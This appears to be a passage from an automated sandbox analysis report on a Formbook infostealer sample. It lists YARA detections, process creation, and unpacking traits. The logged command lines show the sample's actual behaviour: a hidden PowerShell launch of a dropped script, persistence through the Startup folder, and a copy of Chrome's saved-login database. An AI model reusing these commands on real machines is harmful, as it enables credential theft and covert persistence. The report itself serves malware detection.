          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: f5cZJ0WC0H.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@23/11@5/0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20201127Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeFile created: C:\Users\user\AppData\Local\Temp\863733.jsJump to behavior
          Source: f5cZJ0WC0H.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\f5cZJ0WC0H.exe 'C:\Users\user\Desktop\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile written: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: f5cZJ0WC0H.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: f5cZJ0WC0H.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: f5cZJ0WC0H.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000016.00000000.387796376.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: f5cZJ0WC0H.exe, 00000015.00000002.439007026.000000000120F000.00000040.00000001.sdmp, f5cZJ0WC0H.exe, 00000017.00000002.390826703.00000000011AF000.00000040.00000001.sdmp, help.exe, 00000018.00000002.505537240.0000000002CE0000.00000040.00000001.sdmp, ipconfig.exe, 0000001F.00000002.440706619.0000000002E3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: f5cZJ0WC0H.exe, f5cZJ0WC0H.exe, 00000017.00000002.390826703.00000000011AF000.00000040.00000001.sdmp, help.exe, 00000018.00000002.505537240.0000000002CE0000.00000040.00000001.sdmp, ipconfig.exe, 0000001F.00000002.440706619.0000000002E3F000.00000040.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb source: f5cZJ0WC0H.exe
          Source: Binary string: help.pdbGCTL source: f5cZJ0WC0H.exe, 00000017.00000002.388366895.00000000007F0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: f5cZJ0WC0H.exe, 00000017.00000002.388366895.00000000007F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000016.00000000.387796376.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb' source: f5cZJ0WC0H.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: f5cZJ0WC0H.exe, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.f5cZJ0WC0H.exe.f40000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.f5cZJ0WC0H.exe.f40000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 18.0.f5cZJ0WC0H.exe.230000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 18.2.f5cZJ0WC0H.exe.230000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 19.0.f5cZJ0WC0H.exe.690000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 19.2.f5cZJ0WC0H.exe.690000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 21.2.f5cZJ0WC0H.exe.660000.1.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 21.0.f5cZJ0WC0H.exe.660000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 23.0.f5cZJ0WC0H.exe.620000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 23.2.f5cZJ0WC0H.exe.620000.1.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0533ED4A push 850FD83Bh; ret 5_2_0533ED51
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0533BE60 push es; ret 5_2_0533BE76
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0533BEDA push es; ret 5_2_0533BE76
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0533BEC2 push es; ret 5_2_0533BED6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CA1B8 push ebx; retn 0004h18_2_008CA1CA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CE898 push 7804C33Fh; ret 18_2_008CE89D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CBCBB pushad ; ret 18_2_008CBCF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CBCFB pushad ; ret 18_2_008CBCF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CBD1B pushad ; ret 18_2_008CBCF1
